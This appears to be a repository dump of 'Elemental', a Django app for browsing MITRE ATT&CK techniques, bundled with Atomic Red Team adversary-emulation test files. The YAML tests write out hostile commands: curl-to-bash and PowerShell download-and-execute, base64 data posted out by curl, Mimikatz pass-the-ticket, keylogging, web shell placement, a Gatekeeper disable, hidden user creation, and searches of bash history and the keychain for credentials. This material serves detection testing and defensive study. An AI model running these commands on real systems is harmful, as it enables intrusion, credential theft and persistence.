--------------------------------------------------------------------------------
/elemental/matrix/apps.py:
--------------------------------------------------------------------------------
1 | from django.apps import AppConfig
2 |
3 |
4 | class MatrixConfig(AppConfig):
5 | name = 'matrix'
6 |
--------------------------------------------------------------------------------
/elemental/matrix/forms.py:
--------------------------------------------------------------------------------
1 | from django.core.exceptions import ValidationError
2 | from django.utils.translation import ugettext_lazy as _
3 | import datetime # for checking renewal date range.
4 | from matrix.models import Technique, Note
5 | from django import forms
6 |
7 | class noteForm(forms.ModelForm):
8 | class Meta:
9 | model = Note
10 | fields = ('technique', 'note', 'date')
11 |
12 |
13 |
--------------------------------------------------------------------------------
/elemental/matrix/migrations/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/migrations/__init__.py
--------------------------------------------------------------------------------
/elemental/matrix/migrations/__pycache__/0001_initial.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/migrations/__pycache__/0001_initial.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/migrations/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/migrations/__pycache__/__init__.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/static/matrix/elemental.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/static/matrix/elemental.png
--------------------------------------------------------------------------------
/elemental/matrix/static/matrix/style.css:
--------------------------------------------------------------------------------
1 | .sidebar-nav {
2 | margin-top: 20px;
3 | padding: 0;
4 | list-style: none;
5 | }
6 | .coder {
7 | width: 800px;
8 | color: blueviolet;
9 | background-color: gray;
10 | }
11 | li a {
12 | color: blue;
13 | }
--------------------------------------------------------------------------------
/elemental/matrix/templates/elemental.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/templates/elemental.png
--------------------------------------------------------------------------------
/elemental/matrix/templates/matrix/TacticTemplate.html:
--------------------------------------------------------------------------------
1 | {% extends "base_generic.html" %}
2 |
3 | {% block content %}
4 | Tactic List On the MODEL TEMPLATE CLASS
5 | {% if tatic_list %}
6 |
7 | {% for tactic in tatic_list %}
8 | -
9 | {{ tactic.tactic_name }} ({{tactic.tactic_description}})
10 |
11 | {% endfor %}
12 |
13 | {% else %}
14 | There are no Tactics.
15 | {% endif %}
16 | {% endblock %}
--------------------------------------------------------------------------------
/elemental/matrix/templates/matrix/addSigma.html:
--------------------------------------------------------------------------------
1 | {% extends "base_generic.html" %}
2 |
3 |
4 | {% load short_name %}
5 |
6 | {% block title %}Elemental{% endblock %}
7 |
8 | {% block content %}
9 |
10 |
11 |
12 | {% endblock %}
13 |
--------------------------------------------------------------------------------
/elemental/matrix/templates/matrix/addnote.html:
--------------------------------------------------------------------------------
1 | {% extends "base_generic.html" %}
2 | {% block content %}
3 |
4 |
Enter Notes for the Technique
5 |
6 |
7 | {{ technique_id }}
8 |
9 | {% for note in tech_notes %}
10 | {{ note | safe }}
11 | {% endfor %}
12 |
13 |
20 |
21 | {% endblock %}
22 |
23 |
24 |
25 |
26 |
--------------------------------------------------------------------------------
/elemental/matrix/templates/matrix/atomic.html:
--------------------------------------------------------------------------------
1 | {% extends "base_generic.html" %}
2 |
3 | {% block content %}
4 |
5 | {{ atom | safe }}
6 |
7 | {% endblock %}
8 |
9 |
--------------------------------------------------------------------------------
/elemental/matrix/templates/matrix/noteForm.html:
--------------------------------------------------------------------------------
1 | {% extends "base_generic_no_header.html" %}
2 |
3 | {% block content %}
4 |
5 |
16 | {% endblock %}
--------------------------------------------------------------------------------
/elemental/matrix/templates/matrix/note_detail.html:
--------------------------------------------------------------------------------
1 | {% extends "base_generic_no_header.html" %}
2 |
3 | {% block content %}
4 |
5 | Note: {{ note }}
6 | {{note.date}}
7 |
8 |
9 |
Technique Note for: {{note.technique}}
10 |
11 |
Edit Note
12 |
13 |
17 |
18 |
Tactic Title: {{ tactic.tactic_name }}
6 |
7 | Summary: {{ tactic.tactic_description }}
8 |
9 | {% endblock %}
10 |
11 |
--------------------------------------------------------------------------------
/elemental/matrix/templates/matrix/tactic_list.html:
--------------------------------------------------------------------------------
1 | {% extends "base_generic.html" %}
2 |
3 | {% block content %}
4 | Tactic List FROM THE TACTIC_LIST HEML PAGEEE
5 | {% if total_tactics %}
6 |
22 | {% else %}
23 | There are no Tactics for this mother.
24 | {% endif %}
25 | {% endblock %}
--------------------------------------------------------------------------------
/elemental/matrix/templatetags/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/templatetags/__init__.py
--------------------------------------------------------------------------------
/elemental/matrix/templatetags/__pycache__/__init__.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/templatetags/__pycache__/__init__.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/templatetags/__pycache__/short_name.cpython-36.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/Elemental-attack/Elemental/aad0973d0182082003785109aa63eaeb4ac27856/elemental/matrix/templatetags/__pycache__/short_name.cpython-36.pyc
--------------------------------------------------------------------------------
/elemental/matrix/templatetags/short_name.py:
--------------------------------------------------------------------------------
1 | from django import template
2 |
3 | register = template.Library()
4 |
5 | @register.filter
6 | def short_name(value):
7 | return value.replace(" ","-").lower()
8 |
9 | @register.filter
10 | def rem_slash(value):
11 | return value.replace("/","/ ")
12 |
--------------------------------------------------------------------------------
/elemental/matrix/tests.py:
--------------------------------------------------------------------------------
1 | from django.test import TestCase
2 |
3 | # Create your tests here.
4 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1005.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1005
3 | display_name: Data from Local System
4 |
5 | atomic_tests:
6 | - name: Search macOS Safari Cookies
7 | description: |
8 | This test uses `grep` to search a macOS Safari binaryCookies file for specified values. This was used by CookieMiner malware.
9 |
10 | supported_platforms:
11 | - macos
12 |
13 | input_arguments:
14 | search_string:
15 | description: String to search Safari cookies to find.
16 | type: string
17 | default: coinbase
18 |
19 | executor:
20 | name: sh
21 | elevation_required: false
22 | command: |
23 | cd ~/Library/Cookies
24 | grep -q "#{search_string}" "Cookies.binarycookies"
25 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1009.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1009
3 | display_name: Binary Padding
4 |
5 | atomic_tests:
6 | - name: Pad Binary to Change Hash - Linux/macOS dd
7 | description: |
8 | Uses dd to add a zero to the binary to change the hash
9 |
10 | supported_platforms:
11 | - macos
12 | - linux
13 | input_arguments:
14 | file_to_pad:
15 | description: Path of binary to be padded
16 | type: Path
17 | default: /tmp/evil-binary
18 | executor:
19 | name: sh
20 | elevation_required: false
21 | command: |
22 | dd if=/dev/zero bs=1 count=1 >> #{file_to_pad}
23 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1010.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1010
3 | display_name: Application Window Discovery
4 |
5 | atomic_tests:
6 | - name: List Process Main Windows - C# .NET
7 | description: |
8 | Compiles and executes C# code to list main window titles associated with each process.
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | input_source_code:
15 | description: Path to source of C# code
16 | type: path
17 | default: PathToAtomicsFolder\T1010\src\T1010.cs
18 | output_file_name:
19 | description: Name of output binary
20 | type: string
21 | default: T1010.exe
22 |
23 | executor:
24 | name: command_prompt
25 | elevation_required: false
26 | command: |
27 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe -out:#{output_file_name} #{input_source_code}
28 | #{output_file_name}
29 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1030.md:
--------------------------------------------------------------------------------
1 | # T1030 - Data Transfer Size Limits
2 | ## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1030)
3 | An adversary may exfiltrate data in fixed size chunks instead of whole files or limit packet sizes below certain thresholds. This approach may be used to avoid triggering network data transfer threshold alerts.
4 |
5 | ## Atomic Tests
6 |
7 | - [Atomic Test #1 - Data Transfer Size Limits](#atomic-test-1---data-transfer-size-limits)
8 |
9 |
10 |
11 |
12 | ## Atomic Test #1 - Data Transfer Size Limits
13 | Take a file/directory, split it into 5Mb chunks
14 |
15 | **Supported Platforms:** macOS, CentOS, Ubuntu, Linux
16 |
17 |
18 | #### Run it with `sh`!
19 | ```
20 | cd /tmp/
21 | dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
22 | split -b 5000000 /tmp/victim-whole-file
23 | ls -l
24 | ```
25 |
26 |
27 |
28 |
29 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1030.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1030
3 | display_name: Data Transfer Size Limits
4 |
5 | atomic_tests:
6 | - name: Data Transfer Size Limits
7 | description: |
8 | Take a file/directory, split it into 5Mb chunks
9 |
10 | supported_platforms:
11 | - macos
12 | - centos
13 | - ubuntu
14 | - linux
15 |
16 | executor:
17 | name: sh
18 | elevation_required: false
19 | command: |
20 | cd /tmp/
21 | dd if=/dev/urandom of=/tmp/victim-whole-file bs=25M count=1
22 | split -b 5000000 /tmp/victim-whole-file
23 | ls -l
24 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1031.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1031
3 | display_name: Modify Existing Service
4 |
5 | atomic_tests:
6 | - name: Modify Fax service to run PowerShell
7 | description: |
8 | This test will temporarily modify the service Fax by changing the binPath to PowerShell
9 | and will then revert the binPath change, restoring Fax to its original state.
10 |
11 | supported_platforms:
12 | - windows
13 |
14 | executor:
15 | name: command_prompt
16 | elevation_required: true
17 | command: |
18 | sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1031 Test'\""
19 | sc start Fax
20 | cleanup_command:
21 | sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe"
22 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1038.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1038
3 | display_name: DLL Search Order Hijacking
4 |
5 | atomic_tests:
6 | - name: DLL Search Order Hijacking - amsi.dll
7 | description: |
8 | Adversaries can take advantage of insecure library loading by PowerShell to load a vulnerable version
9 | of amsi.dll in order to bypass AMSI (Anti-Malware Scanning Interface)
10 | https://enigma0x3.net/2017/07/19/bypassing-amsi-via-com-server-hijacking/
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | executor:
16 | name: command_prompt
17 | elevation_required: false
18 | command: |
19 | copy %windir%\System32\windowspowershell\v1.0\powershell.exe %APPDATA%\updater.exe
20 | copy %windir%\System32\amsi.dll %APPDATA%\amsi.dll
21 | cmd.exe /k %APPDATA%\updater.exe
22 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1042.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1042
3 | display_name: Change Default File Association
4 |
5 | atomic_tests:
6 | - name: Change Default File Association
7 | description: |
8 | Change Default File Association From cmd.exe
9 |
10 | supported_platforms:
11 | - windows
12 | input_arguments:
13 | extension_to_change:
14 | description: File Extension To Hijack
15 | type: String
16 | default: .wav
17 | target_exenstion_handler:
18 | description: Thing To Open
19 | type: Path
20 | default: C:\Program Files\Windows Media Player\wmplayer.exe
21 | executor:
22 | name: command_prompt
23 | elevation_required: false
24 | command: |
25 | cmd.exe /c assoc #{extension_to_change}="#{target_exenstion_handler}"
26 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1056.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1056
3 | display_name: Input Capture
4 |
5 | atomic_tests:
6 | - name: Input Capture
7 | description: |
8 | Utilize PowerShell and external resource to capture keystrokes
9 | [Payload](https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1056/src/Get-Keystrokes.ps1)
10 | Provided by [PowerSploit](https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Get-Keystrokes.ps1)
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | input_arguments:
16 | filepath:
17 | description: Name of the local file, include path.
18 | type: Path
19 | default: c:\key.log
20 |
21 | executor:
22 | name: powershell
23 | command: |
24 | $PathToAtomicsFolder\T1056\src\Get-Keystrokes.ps1 -LogPath #{filepath}
25 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1057.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1057
3 | display_name: Process Discovery
4 |
5 | atomic_tests:
6 | - name: Process Discovery - ps
7 | description: |
8 | Utilize ps to identify processes
9 |
10 | supported_platforms:
11 | - macos
12 | - centos
13 | - ubuntu
14 | - linux
15 |
16 | input_arguments:
17 | output_file:
18 | description: path of output file
19 | type: path
20 | default: /tmp/loot.txt
21 |
22 | executor:
23 | name: sh
24 | elevation_required: false
25 | command: |
26 | ps >> #{output_file}
27 | ps aux >> #{output_file}
28 |
29 | - name: Process Discovery - tasklist
30 | description: |
31 | Utilize tasklist to identify processes
32 |
33 | supported_platforms:
34 | - windows
35 |
36 | executor:
37 | name: command_prompt
38 | elevation_required: false
39 | command: |
40 | tasklist
41 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1058.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1058
3 | display_name: Service Registry Permissions Weakness
4 |
5 | atomic_tests:
6 | - name: Service Registry Permissions Weakness
7 | description: |
8 | Service registry permissions weakness check and then which can lead to privilege escalation with ImagePath. eg.
9 | reg add "HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name}" /v ImagePath /d "C:\temp\AtomicRedteam.exe"
10 |
11 | supported_platforms:
12 | - windows
13 |
14 | input_arguments:
15 | weak_service_name:
16 | description: weak service check
17 | type: Registry
18 | default: weakservicename
19 |
20 | executor:
21 | name: powershell
22 | elevation_required: false
23 | command: |
24 | get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\* |FL
25 | get-acl REGISTRY::HKLM\SYSTEM\CurrentControlSet\Services\#{weak_service_name} |FL
26 |
27 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1059.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1059
3 | display_name: Command-Line Interface
4 |
5 | atomic_tests:
6 | - name: Command-Line Interface
7 | description: |
8 | Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server.
9 |
10 | This will download the specified payload and set a marker file in `/tmp/art-fish.txt`.
11 |
12 | supported_platforms:
13 | - macos
14 | - centos
15 | - ubuntu
16 | - linux
17 |
18 | executor:
19 | name: sh
20 | command: |
21 | bash -c "curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059/echo-art-fish.sh | bash"
22 | bash -c "wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Atomics/T1059/echo-art-fish.sh | bash"
23 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1073.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1073
3 | display_name: DLL Side-Loading
4 |
5 | atomic_tests:
6 | - name: DLL Side-Loading using the Notepad++ GUP.exe binary
7 | description: |
8 | GUP is an open source signed binary used by Notepad++ for software updates, and is vulnerable to DLL Side-Loading, thus enabling the libcurl dll to be loaded
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | process_name:
15 | description: Name of the created process
16 | type: string
17 | default: calculator.exe
18 |
19 | executor:
20 | name: command_prompt
21 | elevation_required: false
22 | command: |
23 | $PathToAtomicsFolder\T1073\bin\GUP.exe
24 | cleanup_command: |
25 | taskkill /F /IM #{process_name}
--------------------------------------------------------------------------------
/elemental/media/atomics/T1097.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1097
3 | display_name: Pass the Ticket
4 |
5 | atomic_tests:
6 | - name: Mimikatz Kerberos Ticket Attack
7 | description: |
8 | Similar to PTH, but attacking Kerberos
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | user_name:
15 | description: username
16 | type: string
17 | default: Administrator
18 | domain:
19 | description: domain
20 | type: string
21 | default: atomic.local
22 |
23 | executor:
24 | name: command_prompt
25 | command: |
26 | mimikatz # kerberos::ptt #{user_name}@#{domain}
27 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1100.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1100
3 | display_name: Web Shell
4 |
5 | atomic_tests:
6 | - name: Web Shell Written to Disk
7 | description: |
8 | This test simulates an adversary leveraging Web Shells by simulating the file modification to disk.
9 | Idea from APTSimulator.
10 | cmd.aspx source - https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx
11 |
12 | supported_platforms:
13 | - windows
14 | input_arguments:
15 | web_shell_path:
16 | description: The path to drop the web shell
17 | type: string
18 | default: C:\inetpub\wwwroot
19 | web_shells:
20 | description: Path of Web Shell
21 | type: path
22 | default: PathToAtomicsFolder\T1100\shells\
23 | executor:
24 | name: command_prompt
25 | command: |
26 | xcopy #{web_shells} #{web_shell_path}
27 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1103.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1103
3 | display_name: AppInit DLLs
4 |
5 | atomic_tests:
6 | - name: Install AppInit Shim
7 | description: |
8 | AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system
9 |
10 | supported_platforms:
11 | - windows
12 | input_arguments:
13 | registry_file:
14 | description: Windows Registry File
15 | type: Path
16 | default: T1103.reg
17 |
18 | executor:
19 | name: command_prompt
20 | elevation_required: true
21 | command: |
22 | reg.exe import #{registry_file}
23 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1114.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1114
3 | display_name: Email Collection
4 | attack_link: https://attack.mitre.org/wiki/Technique/T1114
5 |
6 | atomic_tests:
7 | - name: T1114 Email Collection with PowerShell
8 |
9 | description: |
10 | Search through local Outlook installation, extract mail, compress the contents, and saves everything to a directory for later exfiltration.
11 |
12 | supported_platforms:
13 | - windows
14 |
15 | executor:
16 | name: command_prompt
17 | elevation_required: false
18 | command: |
19 | Display email contents in the terminal
20 | PS C:\> .\Get-Inbox.ps1
21 |
22 | Write emails out to a CSV
23 | PS C:\> .\Get-Inbox.ps1 -file "mail.csv"
24 |
25 | Download and Execute
26 | "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1114/Get-Inbox.ps1')"
27 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1115.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1115
3 | display_name: Clipboard Data
4 | attack_link: https://attack.mitre.org/wiki/Technique/T1115
5 |
6 | atomic_tests:
7 | - name: Utilize Clipboard to store or execute commands from
8 | description: |
9 | Add data to clipboard to copy off or execute commands from.
10 | supported_platforms:
11 | - windows
12 | executor:
13 | name: command_prompt
14 | elevation_required: false
15 | command: |
16 | dir | clip
17 | clip < readme.txt
18 |
19 | - name: PowerShell
20 | description: |
21 | Utilize PowerShell to echo a command to clipboard and execute it
22 | supported_platforms:
23 | - windows
24 | executor:
25 | name: powershell
26 | elevation_required: false
27 | command: |
28 | echo Get-Process | clip
29 | Get-Clipboard | iex
30 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1122.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1122
3 | display_name: Component Object Model Hijacking
4 |
5 | atomic_tests:
6 | - name: Component Object Model Hijacking
7 | description: |
8 | Hijack COM Object used by certutil.exe
9 |
10 | supported_platforms:
11 | - windows
12 | executor:
13 | name: command_prompt
14 | command: |
15 | reg import PathToAtomicsFolder\T1122\src\COMHijack.reg
16 | certutil.exe -CAInfo
17 | cleanup_command: |
18 | reg import PathToAtomicsFolder\T1122\src\COMHijackCleanup.reg
19 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1124.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1124
3 | display_name: System Time Discovery
4 |
5 | atomic_tests:
6 | - name: System Time Discovery
7 | description: |
8 | Identify the system time
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | computer_name:
15 | description: computer name to query
16 | type: string
17 | default: localhost
18 |
19 | executor:
20 | name: command_prompt
21 | elevation_required: false
22 | command: |
23 | net time \\#{computer_name}
24 | w32tm /tz
25 |
26 | - name: System Time Discovery - PowerShell
27 | description: |
28 | Identify the system time via PowerShell
29 |
30 | supported_platforms:
31 | - windows
32 |
33 | executor:
34 | name: powershell
35 | elevation_required: false
36 | command: |
37 | Get-Date
38 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1127.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1127
3 | display_name: Trusted Developer Utilities
4 | atomic_tests:
5 | - name: MSBuild Bypass Using Inline Tasks
6 | description: |
7 | Executes the code in a project file using. C# Example
8 | supported_platforms:
9 | - windows
10 | input_arguments:
11 | filename:
12 | description: Location of the project file
13 | type: Path
14 | default: T1127.csproj
15 | executor:
16 | name: command_prompt
17 | elevation_required: false
18 | command: |
19 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe #{filename}
20 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1128.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1128
3 | display_name: Netsh Helper DLL
4 |
5 | atomic_tests:
6 | - name: Netsh Helper DLL Registration
7 | description: |
8 | Netsh interacts with other operating system components using dynamic-link library (DLL) files
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | helper_file:
15 | description: Path to DLL
16 | type: Path
17 | default: C:\Path\file.dll
18 |
19 | executor:
20 | name: command_prompt
21 | command: |
22 | netsh.exe add helper #{helper_file}
23 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1132.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1132
3 | display_name: Data Encoding
4 |
5 | atomic_tests:
6 | - name: Base64 Encoded data.
7 | description: |
8 | Utilizing a common technique for posting base64 encoded data.
9 |
10 | supported_platforms:
11 | - macos
12 | - linux
13 |
14 | input_arguments:
15 | destination_url:
16 | description: Destination URL to post encoded data.
17 | type: string
18 | default: redcanary.com
19 | base64_data:
20 | description: Encoded data to post using fake Social Security number 111-11-1111.
21 | type: string
22 | default: MTExLTExLTExMTE=
23 |
24 | executor:
25 | name: sh
26 | command: |
27 | echo -n 111-11-1111 | base64
28 | curl -XPOST #{base64_data}.#{destination_url}
29 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1134.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1134
3 | display_name: Access Token Manipulation
4 |
5 | atomic_tests:
6 | - name: Access Token Manipulation
7 | description: |
8 | Creates a process as another user
9 | Requires Administrator Privileges To Execute Test
10 | supported_platforms:
11 | - windows
12 | input_arguments:
13 | target_user:
14 | description: Username To Steal Token From
15 | type: String
16 | default: SYSTEM
17 | executor:
18 | name: powershell
19 | elevation_required: true
20 | command: |
21 | #list processes by user,
22 |
23 | $owners = @{}
24 | gwmi win32_process |% {$owners[$_.handle] = $_.getowner().user}
25 | get-process | select processname,Id,@{l="Owner";e={$owners[$_.id.tostring()]}}
26 | #Steal Token
27 | . .\src\T1134.ps1
28 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1139.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1139
3 | display_name: Bash History
4 |
5 | atomic_tests:
6 | - name: Search Through Bash History
7 | description: |
8 | Search through bash history for specifice commands we want to capture
9 | supported_platforms:
10 | - linux
11 | - macos
12 | input_arguments:
13 | bash_history_filename:
14 | description: Path of the bash history file to capture
15 | type: Path
16 | default: ~/.bash_history
17 | bash_history_grep_args:
18 | description: grep arguments that filter out specific commands we want to capture
19 | type: Path
20 | default: -e '-p ' -e 'pass' -e 'ssh'
21 | output_file:
22 | description: Path where captured results will be placed
23 | type: Path
24 | default: ~/loot.txt
25 | executor:
26 | name: sh
27 | command: |
28 | cat #{bash_history_filename} | grep #{bash_history_grep_args} > #{output_file}
29 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1142.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1142
3 | display_name: Keychain
4 |
5 | atomic_tests:
6 | - name: Keychain
7 | description: |
8 | ### Keychain Files
9 |
10 | ~/Library/Keychains/
11 |
12 | /Library/Keychains/
13 |
14 | /Network/Library/Keychains/
15 |
16 | [Security Reference](https://developer.apple.com/legacy/library/documentation/Darwin/Reference/ManPages/man1/security.1.html)
17 |
18 | [Keychain dumper](https://github.com/juuso/keychaindump)
19 |
20 |
21 | supported_platforms:
22 | - macos
23 |
24 | executor:
25 | name: sh
26 | command: |
27 | security -h
28 | security find-certificate -a -p > allcerts.pem
29 | security import /tmp/certs.pem -k
30 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1143.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1143
3 | display_name: Hidden Window
4 |
5 | atomic_tests:
6 | - name: Hidden Window
7 | description: |
8 | Launch PowerShell with the "-WindowStyle Hidden" argument to conceal PowerShell windows by setting the WindowStyle parameter to hidden.
9 |
10 | supported_platforms:
11 | - windows
12 |
13 | input_arguments:
14 | powershell_command:
15 | description: Command to launch calc.exe from a hidden PowerShell Window
16 | type: String
17 | default: powershell.exe -WindowStyle hidden calc.exe
18 | powershell_process_name:
19 | description: Name of the created process
20 | type: string
21 | default: calculator
22 |
23 | executor:
24 | name: powershell
25 | elevation_required: false
26 | command: |
27 | Start-Process #{powershell_command}
28 | cleanup_command: |
29 | Stop-Process -Name "#{powershell_process_name}"
--------------------------------------------------------------------------------
/elemental/media/atomics/T1144.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1144
3 | display_name: Gatekeeper Bypass
4 |
5 | atomic_tests:
6 | - name: Gatekeeper Bypass
7 | description: |
8 | Gatekeeper Bypass via command line
9 |
10 | supported_platforms:
11 | - macos
12 |
13 | input_arguments:
14 | app_path:
15 | description: Path to app to be used
16 | type: Path
17 | default: myapp.app
18 |
19 | executor:
20 | name: sh
21 | command: |
22 | sudo xattr -r -d com.apple.quarantine #{app_path}
23 | sudo spctl --master-disable
24 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1147.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1147
3 | display_name: Hidden Users
4 |
5 | atomic_tests:
6 | - name: Hidden Users
7 | description: |
8 | Add a hidden user on MacOS
9 |
10 | supported_platforms:
11 | - macos
12 |
13 | input_arguments:
14 | user_name:
15 | description: username to add
16 | type: string
17 | default: APT
18 |
19 | executor:
20 | name: sh
21 | command: |
22 | sudo dscl . -create /Users/#{user_name} UniqueID 333
23 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1148.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1148
3 | display_name: HISTCONTROL
4 |
5 | atomic_tests:
6 | - name: Disable history collection
7 | description: |
8 | Disables history collection in shells
9 | supported_platforms:
10 | - linux
11 | - macos
12 | input_arguments:
13 | evil_command:
14 | description: Command to run after shell history collection is disabled
15 | type: String
16 | default: whoami
17 | executor:
18 | name: sh
19 | command: |
20 | export HISTCONTROL=ignoreboth
21 | ls #{evil_command}
22 |
23 | - name: Mac HISTCONTROL
24 | description: |
25 |
26 | supported_platforms:
27 | - macos
28 | - linux
29 |
30 | executor:
31 | name: manual
32 | steps: |
33 | 1. export HISTCONTROL=ignoreboth
34 | 2. echo export "HISTCONTROL=ignoreboth" >> ~/.bash_profile
35 | 3. ls
36 | 4. whoami > recon.txt
37 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1150.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1150
3 | display_name: Plist Modification
4 |
5 | atomic_tests:
6 | - name: Plist Modification
7 | description: |
8 | Modify MacOS plist file in one of two directories
9 |
10 | supported_platforms:
11 | - macos
12 |
13 | executor:
14 | name: manual
15 | steps: |
16 | 1. Modify a .plist in
17 |
18 | /Library/Preferences
19 |
20 | OR
21 |
22 | ~/Library/Preferences
23 |
24 | 2. Subsequently, follow the steps for adding and running via [Launch Agent](Persistence/Launch_Agent.md)
25 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1151.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1151
3 | display_name: Space After Filename
4 |
5 | atomic_tests:
6 | - name: Space After Filename
7 | description: |
8 | Space After Filename
9 |
10 | supported_platforms:
11 | - macos
12 |
13 | executor:
14 | name: manual
15 | steps: |
16 | 1. echo '#!/bin/bash\necho "print \"hello, world!\"" | /usr/bin/python\nexit' > execute.txt && chmod +x execute.txt
17 |
18 | 2. mv execute.txt "execute.txt "
19 |
20 | 3. ./execute.txt\
21 |
--------------------------------------------------------------------------------
/elemental/media/atomics/T1152.yaml:
--------------------------------------------------------------------------------
1 | ---
2 | attack_technique: T1152
